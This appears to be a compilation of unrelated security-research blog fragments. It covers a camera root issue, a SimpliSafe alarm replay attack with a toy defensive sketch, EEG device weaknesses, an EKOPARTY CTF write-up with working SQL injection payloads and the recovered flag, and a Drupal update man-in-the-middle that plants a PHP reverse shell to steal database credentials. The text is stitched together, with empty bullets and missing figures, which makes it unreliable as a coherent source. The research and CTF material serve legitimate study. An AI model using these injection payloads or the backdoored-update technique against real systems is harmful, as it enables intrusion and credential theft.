An attacker with Administrator (admin) access to the administrative web panel of a TP-LINK Cloud Camera can gain root access to the device, fully compromising its confidentiality, integrity, and availability.

Year: 2016







Inside the IOActive Silicon Lab: Reading CMOS layout

| Material | Color |
| --- | --- |
| P doping | |
| N doping | |
| Polysilicon | |
| Via | |
| Metal 1 | |
| Metal 2 | |
| Metal 3 | |
| Metal 4 | |



Remotely Disabling a Wireless Burglar Alarm



SimpliSafe Alarm System Replay Attack

The radio interface for the SimpliSafe home burglar/fire alarm systems is not encrypted and does not use “rolling codes,” nonces, two-way handshakes, or other techniques to prevent transmissions from being recorded and reused. An attacker who can intercept the radio signals between the keypad and the base station can record the disarm signal and replay it later to turn off the alarm at a time of their choosing.
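To make the missing protection concrete, here is a minimal sketch contrasting a receiver that accepts a fixed frame with one that requires an authenticated, strictly increasing counter. It is not SimpliSafe's protocol: the frame layout, the `SECRET` key, the `DISARM` label, and both receiver classes are hypothetical and exist only to illustrate why a recorded transmission stops working once a rolling counter is enforced.

```python
import hashlib
import hmac

SECRET = b"demo-shared-key"  # hypothetical key shared by keypad and base station


def make_frame(key: bytes, counter: int) -> bytes:
    """Build a disarm frame: 8-byte counter followed by an HMAC-SHA256 tag."""
    counter_bytes = counter.to_bytes(8, "big")
    tag = hmac.new(key, b"DISARM" + counter_bytes, hashlib.sha256).digest()
    return counter_bytes + tag


class StaticReceiver:
    """Accepts any frame equal to the fixed disarm frame, so replays succeed."""

    def __init__(self, disarm_frame: bytes) -> None:
        self.disarm_frame = disarm_frame

    def accept(self, frame: bytes) -> bool:
        return frame == self.disarm_frame


class CounterReceiver:
    """Accepts a frame only if its tag verifies and its counter is new."""

    def __init__(self, key: bytes) -> None:
        self.key = key
        self.last_counter = -1

    def accept(self, frame: bytes) -> bool:
        counter_bytes, tag = frame[:8], frame[8:]
        expected = hmac.new(self.key, b"DISARM" + counter_bytes, hashlib.sha256).digest()
        if not hmac.compare_digest(tag, expected):
            return False  # forged or corrupted frame
        counter = int.from_bytes(counter_bytes, "big")
        if counter <= self.last_counter:
            return False  # replayed or stale frame
        self.last_counter = counter
        return True


# A fixed frame works every time it is replayed.
captured = b"DISARM-PIN-1234"  # hypothetical recorded transmission
static_rx = StaticReceiver(captured)
static_results = [static_rx.accept(captured), static_rx.accept(captured)]

# With a counter, the second use of the same frame is rejected.
counter_rx = CounterReceiver(SECRET)
frame = make_frame(SECRET, 1)
counter_results = [counter_rx.accept(frame), counter_rx.accept(frame)]
```

In this toy model the static receiver accepts the captured frame on every replay, while the counter-based receiver accepts it once and rejects the repeat.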







Brain Waves Technologies: Security in Mind? I Don’t Think So

I should note that real attack scenarios are a bit hard for me to achieve, since I lack specific expertise in interpreting EEG data; however, I believe I effectively demonstrate that such attacks are 100 percent feasible.

Through Internet research, I reviewed several technical manuals, specifications, and brochures for EEG devices and software. I searched the documents for the keywords ‘secur’, ‘crypt’, ‘auth’, and ‘passw’; 90 percent contained no such reference. It’s pretty obvious that security has not been considered at all.
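A keyword survey like this can be sketched in a few lines. The snippet below is only an illustration of the approach, assuming the documents are already available as plain text; the function names and the sample documents are hypothetical and are not the material reviewed in the post.

```python
KEYWORDS = ("secur", "crypt", "auth", "passw")


def mentions_security(text: str) -> bool:
    """Return True if any keyword stem appears in the text (case-insensitive)."""
    lowered = text.lower()
    return any(keyword in lowered for keyword in KEYWORDS)


def share_without_keywords(documents: list[str]) -> float:
    """Fraction of documents that contain none of the keyword stems."""
    if not documents:
        return 0.0
    missing = sum(1 for text in documents if not mentions_security(text))
    return missing / len(documents)


# Hypothetical sample texts, used only to exercise the functions.
sample_docs = [
    "Amplifier specifications: 32 channels, 24-bit resolution.",
    "Data is streamed over TCP to the acquisition software.",
    "Password-protected export of patient records.",
    "Electrode placement guide for clinical recordings.",
]
share = share_without_keywords(sample_docs)
```

Matching on stems such as `secur` rather than whole words catches "security", "secure", and "secured" with a single check.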



I recorded the whole MITM attack (full screen is recommended):

For this demonstration, I changed only an ASCII string (the patient name); however, the actual EEG data can be easily manipulated in binary format.





- Neuroelectrics NIC TCP Server Remote DoS
- OpenViBE (software for Brain Computer Interfaces and Real Time Neurosciences) Acquisition Server Remote DoS

I think that bugs in client-side applications are less relevant. The attack surface is reduced because this software is used only by specialists. I don’t expect exploit code for EEG software to appear in the future, but attackers often launch surprising attacks, so this software should still be secured.

MISC

More than a simple game



EKOPARTY Conference 2015, one of the most important conferences in Latin America, took place in Buenos Aires three months ago. IOActive and EKOPARTY hosted the main security competition, the EKOPARTY CTF (Capture the Flag), in which about 800 teams competed over 32 hours.

Teams from all around the globe demonstrated their skills in a variety of topics including web application security, reverse engineering, exploiting, and cryptography. It was a wonderful experience.

Competition, types, and resources

- Fun while learning.
- Legally prepared environments ready to be hacked; you are authorized to test the problems.
- Recognition and use of multiple paths to solve a problem.
- Understanding of specialized attacks which are not usually detectable or exploitable by common tools.
- Free participation, typically.
- Good recruiting tool for information security companies.

- CTFs (Capture the Flag) are restricted by time:
  - Jeopardy: Problems are distributed in multiple categories which must be solved separately. The most common categories are programming, computer and network forensics, cryptography, reverse engineering, exploiting, web application security, and mobile security.
  - Attack-defense: Problems are distributed across vulnerable services which must be protected on the defended machine and exploited on remote machines. This kind of competition mostly provides a vulnerable infrastructure.
- Wargames are not restricted by time and may have the two subtypes above.

EKOPARTY CTF 2015

- Trivia problems: questions about EKOPARTY.
- Web application security: multiple web application attacks.
- Cryptography: classical and modern encryption.
- Reversing: problems with the use of different technologies and architectures.
- Exploiting: vulnerable binaries with known protections.
- Miscellaneous: forensic and programming tasks.

To review the challenges, go to the EKOPARTY 2015 github repository.

| Category | Task | Score | Description and references |
| --- | --- | --- | --- |
| Trivia | Trivia problems | ~ | Specific questions related to EKOPARTY |
| Web | Pass Chek | 50 | PHP strcmp unsafe comparison using an array. Reference: Type Juggling |
| Web | Custom ACL | 100 | ACL bypass using external host |
| Web | Crazy JSON | 300 | Esoteric programming language with string encryption |
| Web | Rand DOOM | 400 | Insecure use of mt_rand, recover administrator token via seed leak |
| Web | SVG Viewer | 500 | XXE injection with UTF-16 bypass and use of PHP strip_tags vulnerability to disclose source code. Reference: XXE injection UTF-16 bypass |
| Crypto | SCYTCRYPTO | 50 | Scytale message decryption |
| Crypto | Weird Vigenere | 100 | Kasiski analysis over modified Vigenere |
| Crypto | XOR Crypter | 200 | XOR shift message decryption. Reference: Reversing shift XOR operation |
| Crypto | VBOX DIE | 300 | VBOX encrypted disk password recovery. Reference: VirtualBox Disk Image Encryption password cracking |
| Crypto | Break the key | 400 | Use of CVE-2008-0166 to get the plaintext from an encrypted message |
| Reversing | Patch me | 50 | MSIL code patching |
| Reversing | Counter | 100 | Dynamic analysis of an LLVM-obfuscated binary |
| Reversing | Malware | 200 | Break RSA key to send malicious code to the C&C server |
| Reversing | Dreaming | 300 | SH4 binary |
| Reversing | HOT | 400 | Blackberry Z10 application and exploitation of a SQL injection which was protected through a modified HMAC algorithm |
| Reversing | Backdoor OS | 500 | Custom kernel where you need to find the backdoor authentication key |
| Exploiting | Baby pwn | 50 | Buffer overflow with restricted input format |
| Exploiting | Frequency | 100 | BSS buffer overflow with a directory traversal which leaks data from files through character frequencies |
| Exploiting | OTaaS | 200 | ARM syscall override which leaks information if appropriate parameters are passed |
| Exploiting | File Manager | 300 | Stack-based buffer overflow produced by strncat while listing files inside a folder; need to bypass multiple protections such as ASLR, NX, PIE, and FULL RELRO |
| Miscellaneous | Olive | 50 | VNC client key event recovery |
| Miscellaneous | Press it | 100 | Scancodes recognition |
| Miscellaneous | Onion | 200 | Use of CVE-2015-7665 to leak user’s IP |
| Miscellaneous | Poltergeist | 300 | AM frequencies generator using screen waves |









Example of reversing problem – HOT 400 points

The binary uses a SOAP-based web service to retrieve weather information from the selected city (either Buenos Aires or Mordor), so we need to reverse the binary and find out if we are able to retrieve more information.

-



The main execution flow starts within the requestWeatherInformation method from WeatherService class, and city zipcode is its unique argument. It is converted from QString to QByteArray for further processing:

-



QByteArray key is filled with a loop, key[i] = i:

-

Then a message authentication code is calculated using the key and zipcode MAC(key, zipcode):

-


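The key construction and MAC step can be sketched as follows. This is an approximation under stated assumptions, not the challenge's algorithm: the challenge table describes the HMAC as modified, so standard HMAC will not reproduce the verification values shown in this post. The 64-byte key length, the use of SHA-1 (chosen only because those verification values decode to 20 bytes, SHA-1's output size), and the function names are all assumptions.

```python
import base64
import hashlib
import hmac


def build_key(length: int = 64) -> bytes:
    """Key filled as key[i] = i; the length is an assumption (must be <= 256)."""
    return bytes(range(length))


def verification(zipcode: str, key: bytes) -> str:
    """Standard HMAC-SHA1 over the ZIP code, Base64-encoded.

    The real binary uses a modified HMAC, so this only shows the
    overall shape of MAC(key, zipcode), not the exact values.
    """
    digest = hmac.new(key, zipcode.encode("utf-8"), hashlib.sha1).digest()
    return base64.b64encode(digest).decode("ascii")


# Example call with a ZIP code that appears in the queries in this post.
token = verification("1010", build_key())
```

Because the key is a fixed, predictable sequence, anyone who recovers the MAC routine from the binary can compute a valid verification value for an arbitrary ZIP string, including one carrying a SQL payload.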

Then a SOAP message is built using the following data:

-

Host: ctfchallenges.ctf.site

-

Port: 10000

-

Action: http://ctfchallenges.ctf.site:1000/ekoweather/GetCityWeatherByZIP (no longer active)

-

Argument 1: ZIP

-

Argument 2: verification

-

-



Zip argument is vulnerable to SQL injection.

-

Description is always trimmed to 16 chars.

- ZIP: -1 or 1=1-- -
  - verification: biNa0y7ngymXd6kbGMmNhOYiNQM=
  - Success: true
  - ResponseText: City Found
  - Description: EKO{r3v_with_web
- ZIP: -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14-- -
  - verification: B2LDiOPSSCOCK0tJvidyyo1d1HI=
  - Success: true
  - ResponseText: City Found
  - Description: 7
- ZIP: -1 union select 1,2,3,4,5,6,substr(description,16),8,9,10,11,12,13,14 from data where zipcode != 1010 and zipcode != 1337-- -
  - verification: r7WuMbNcbvncnJc8HwKnqM4q9kA=
  - Success: true
  - ResponseText: City Found
  - Description: b_is_the_best!}
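The way the 16-character limit is worked around with substr() can be reproduced locally. The sketch below uses an in-memory SQLite database as a stand-in for the remote service, so the two-column table layout, the ZIP code 31337, and the `leak` and `recover` helpers are hypothetical. The flag string is the one obtained by joining the two responses above, which overlap by one character because substr(description,16) starts at the 16th character.

```python
import sqlite3

TRIM = 16  # the service returns at most 16 characters of the description


def leak(conn: sqlite3.Connection, expr: str) -> str:
    """Stand-in for one injected request: evaluate expr, then trim like the server."""
    row = conn.execute(f"SELECT {expr} FROM data").fetchone()
    return row[0][:TRIM]


def recover(conn: sqlite3.Connection) -> str:
    """Read the full description in 16-character windows using substr()."""
    parts = []
    offset = 1  # SQL substr() positions are 1-indexed
    while True:
        chunk = leak(conn, f"substr(description, {offset})")
        if not chunk:
            break
        parts.append(chunk)
        if len(chunk) < TRIM:
            break  # a short chunk means the end of the value was reached
        offset += TRIM
    return "".join(parts)


# Hypothetical local copy of the hidden row.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE data (zipcode INTEGER, description TEXT)")
conn.execute(
    "INSERT INTO data VALUES (?, ?)",
    (31337, "EKO{r3v_with_web_is_the_best!}"),
)

first = leak(conn, "description")
second = leak(conn, "substr(description, 16)")
flag = recover(conn)
```

Starting the second window at offset 17 instead of 16 avoids the overlapping character; either offset recovers the full value as long as the pieces are joined accordingly.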



Some numbers

- Trivia challenges often involve guessing, so failed attempts are higher on trivia problems.
- The most difficult problems have fewer failed attempts, and the number of solves is roughly proportional to the number of failed attempts.
- In this CTF, reversing and exploiting were the most difficult problems.



Scoreboard

- More Smoked Leet Chicken, from Russia, who led during the competition!
- !SpamAndHex, from Hungary.
- samurai, from the United States.
- Shellphish, from the United States.
- SecuritySignal, local winner from Argentina.











Drupal – Insecure Update Process

- http://yoursite/?q=admin/reports/updates/check

- The current security update (named on purpose “7.41 Backdoored“)

- The security update is required and a download link button

- The URL of the malicious update that will be downloaded



As part of the update, I included a reverse shell from pentestmonkey (http://pentestmonkey.net/tools/web-shells/php-reverse-shell) that will connect back to me, let me interact with the Linux shell, and finally, allow me to retrieve the Drupal database password:

TL;DR – It is possible to achieve code execution and obtain the database credentials when performing a man-in-the-middle attack against the Drupal update process. All Drupal versions are affected.